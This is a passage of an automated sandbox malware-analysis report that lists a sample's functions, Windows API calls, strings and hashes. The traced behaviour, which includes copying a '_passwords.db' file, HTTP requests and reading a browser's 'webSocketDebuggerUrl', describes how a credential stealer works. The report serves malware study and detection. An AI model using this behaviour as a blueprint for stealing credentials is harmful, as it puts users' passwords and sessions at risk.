                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$File$Process$lstrcat$lstrcpy$CloseFreeHandle$AllocateCopyCreateDeleteExistsPathReadSizeSleeplstrlen
                                                                                                                                                                                                                                                  • String ID: _passwords.db
                                                                                                                                                                                                                                                  • API String ID: 3175396866-1485422284
                                                                                                                                                                                                                                                  • Opcode ID: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
                                                                                                                                                                                                                                                  • Instruction ID: dd26fa20e6740df926561d89e38a7e43f5c20e24c5d15dedf75b600327ce6420
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5A1A5B59002199BCB01FFB2DC46AEE7BB9FF45305F404019F811A7191DF78AA85CBA9
                                                                                                                                                                                                                                                  Function 0040B4F2 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 308memoryfilesleepCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B665
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B6A8
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B6B4
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B7F1
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040B80F
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040B82D
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B8E1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8EF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$File$Process$lstrcatlstrcpy$CloseFreeHandleSleep$AllocateCopyCreateDeleteExistsPathReadSizelstrlen
                                                                                                                                                                                                                                                  • String ID: _passwords.db
                                                                                                                                                                                                                                                  • API String ID: 102524898-1485422284
                                                                                                                                                                                                                                                  • Opcode ID: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
                                                                                                                                                                                                                                                  • Instruction ID: c2ce34365f7a7f117e03430e8c543a584d37913e59bd2e1ff373fdd8620fef08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37C1C5B59006099BCB01EF71CC46AEEB7B9FF55308F008119F81567191EF78AB89CB98
                                                                                                                                                                                                                                                  Function 00408807 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 199networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3254 408807-40888b call 413740 call 406be0 call 41370e call 41398e InternetOpenA StrCmpCA 3263 408891-4088c4 InternetConnectA 3254->3263 3264 4089f4-4089fb 3254->3264 3263->3264 3267 4088ca-4088f3 3263->3267 3265 408a17-408a27 call 41370e 3264->3265 3266 4089fd-408a10 3264->3266 3273 408ab4-408ad6 call 413770 * 3 3265->3273 3266->3265 3268 4088f5-4088ff 3267->3268 3269 408906-408919 3267->3269 3268->3269 3274 408a2c-408a2e InternetCloseHandle 3269->3274 3275 40891f-408923 3269->3275 3279 408a34-408a3b 3274->3279 3277 408925-408934 InternetSetOptionA 3275->3277 3278 40893a-408968 HttpSendRequestA HttpQueryInfoA 3275->3278 3277->3278 3278->3279 3281 40896e-408979 call 4147cc 3278->3281 3282 408a57-408a64 call 41370e 3279->3282 3283 408a3d-408a50 3279->3283 3292 408a66-408a70 3281->3292 3293 40897f-408981 3281->3293 3291 408aae 3282->3291 3283->3282 3297 408ab1 3291->3297 3295 408a72-408a85 3292->3295 3296 408a8c-408a99 call 41370e 3292->3296 3298 408987-408997 3293->3298 3299 408a9b-408aa9 InternetCloseHandle call 413740 3293->3299 3295->3296 3296->3297 3297->3273 3302 408998-4089a0 InternetReadFile 3298->3302 3299->3291 3302->3299 3304 4089a6-4089ab 3302->3304 3304->3299 3305 4089b1-4089f2 call 413860 call 4137c0 call 413770 3304->3305 3305->3302
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040886C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00408883
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 004088BC
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00408934
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 00408948
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00408960
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00408998
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00408A2E
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00408A9C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttplstrcpy$ConnectCrackFileInfoOpenOptionQueryReadRequestSendlstrlen
                                                                                                                                                                                                                                                  • String ID: GET$p7c
                                                                                                                                                                                                                                                  • API String ID: 2041234948-2983962290
                                                                                                                                                                                                                                                  • Opcode ID: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
                                                                                                                                                                                                                                                  • Instruction ID: cd878151b0f7b65b431806c7ff5f9c38d997bf391b335ef2749d71c6156296e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8371E3B1A002199FDB10EF61DC45BFEBBB9AF84304F00512EF8456B2D1DB789A85CB95
                                                                                                                                                                                                                                                  Function 00409638 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 144networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3312 409638-409659 call 420cd0 3315 409670-40968a 3312->3315 3316 40965b-409669 3312->3316 3318 409690-40969e 3315->3318 3319 40982e-40984b call 41232c 3315->3319 3316->3315 3321 4096a0 3318->3321 3322 4096c1-4096df 3318->3322 3325 409873-40987f 3319->3325 3324 4096a5-4096b8 3321->3324 3328 4096e5-409716 InternetReadFile 3322->3328 3329 409827-409828 InternetCloseHandle 3322->3329 3324->3324 3326 4096ba 3324->3326 3326->3322 3330 409745-40975d InternetCloseHandle * 2 3328->3330 3331 409718-40971d 3328->3331 3329->3319 3333 409784-40979e call 409912 3330->3333 3334 40975f-40977d 3330->3334 3331->3330 3332 40971f 3331->3332 3335 409723-40973c call 409882 InternetReadFile 3332->3335 3340 4097a4-4097ab 3333->3340 3341 40984d-409865 call 41232c 3333->3341 3334->3333 3335->3330 3342 40973e-409743 3335->3342 3344 4097ad-4097c7 3340->3344 3345 4097ce-4097e9 call 409912 3340->3345 3346 40986a-40986e call 409942 3341->3346 3342->3330 3342->3335 3344->3345 3350 4097fb-409825 call 409912 call 4123ca 3345->3350 3351 4097eb-4097f4 3345->3351 3346->3325 3350->3346 3351->3350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00409746
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(19d), ref: 00409750
                                                                                                                                                                                                                                                    • Part of subcall function 004123CA: memcpy.MSVCRT(?,00000010,?,?,?,?,00412388,?,?,?,?,?,?,0041234F,?,00000000), ref: 00412417
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleRead$memcpy
                                                                                                                                                                                                                                                  • String ID: "webSocketDebuggerUrl":$"ws://$19d
                                                                                                                                                                                                                                                  • API String ID: 1306965030-1558842042
                                                                                                                                                                                                                                                  • Opcode ID: 7445a687bfbefb0145415f50722c0bd67ce230f59d10555b825b6c8669fb3561
                                                                                                                                                                                                                                                  • Instruction ID: 7da362284cd13523119220d227888eaded019d737fe5024c9539090ef5163025
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7445a687bfbefb0145415f50722c0bd67ce230f59d10555b825b6c8669fb3561
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5511574109390AAE321AF35D80576B7FE6AF92308F04251DF4C5573E2EBF98A88C756
                                                                                                                                                                                                                                                  Function 009B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 009B024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: 9e9f84a109257b54853148e16428cd8b539b9773b1213dbfa97cba74c9b7c1b4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43527874A00229DFDB64CF68C984BADBBB1BF49314F1480D9E94DAB251DB30AE84DF14
                                                                                                                                                                                                                                                  Function 00415342 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00415362
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 0041536E
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004153A8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 004153B0
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004153BB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction ID: 1367e15fed5f08099624327341a9f6b83cbc5b8f1d39b42116c2796aecc681f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4018875201A09AFE3201B60AC8AFFB76ADFF86782F141025F915D6290DFB88C918665
                                                                                                                                                                                                                                                  Function 0040AE6D Relevance: 9.1, APIs: 6, Instructions: 75filememoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
